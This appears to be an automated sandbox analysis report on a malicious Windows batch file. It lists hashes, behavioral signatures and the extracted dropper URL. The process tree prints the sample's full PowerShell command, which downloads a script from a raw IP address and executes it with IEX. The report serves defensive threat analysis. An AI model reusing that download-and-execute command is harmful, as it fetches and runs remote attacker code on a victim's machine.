Analysis
- max time kernel: 13s
- max time network: 50s
- platform: windows7_x64
- resource: win7
- submitted: 01-09-2020 20:10
Static task
- static1
Behavioral task
- behavioral1
  Sample: 484333e52a633dd4ddba453c88728166.bat
  Resource: win7 (windows7_x64)
  0 signatures
  0 seconds
Behavioral task
- behavioral2
  Sample: 484333e52a633dd4ddba453c88728166.bat
  Resource: win10v200722 (windows10_x64)
  0 signatures
  0 seconds
General
- Target: 484333e52a633dd4ddba453c88728166.bat
- Size: 220B
- MD5: 78a20a9e11dcafee6975c27337f224f6
- SHA1: bf2f2d540d8c622f2c35950b2517e06bd1ffa085
- SHA256: bdb3f36c480f19ec8d2aa9a181d0f606f53586ba44e2065be4b5a94cc4460913
- SHA512: 206fdef2f70c68a78c5a261d15e795faf814384a3124f9dc149ce215eb15e9b2fb7dea1aef79183228a5af6d014bd3dc6cacaaab6b9cbeaf81d95475406717ab
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source: ps1.dropper
- URLs: http://185.103.242.78/pastes/484333e52a633dd4ddba453c88728166
Signatures
- Blacklisted process makes network request (1 IoC)
  Processes (flow / pid / process):
  6 / 1296 / powershell.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes (pid / process):
  1296 / powershell.exe
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes (pid / process):
  1296 / powershell.exe
  1296 / powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes (description / pid / process):
  Token: SeDebugPrivilege / 1296 / powershell.exe
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes (description / pid / process / target process):
  PID 1492 wrote to memory of 1296 / 1492 / cmd.exe / powershell.exe
  PID 1492 wrote to memory of 1296 / 1492 / cmd.exe / powershell.exe
  PID 1492 wrote to memory of 1296 / 1492 / cmd.exe / powershell.exe
  PID 1492 wrote to memory of 1296 / 1492 / cmd.exe / powershell.exe
Processes
- C:\Windows\system32\cmd.exe (depth 1)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\484333e52a633dd4ddba453c88728166.bat"
  - Suspicious use of WriteProcessMemory
  PID: 1492
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/484333e52a633dd4ddba453c88728166');Invoke-ZRFBQPCGMEHHZ;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 1296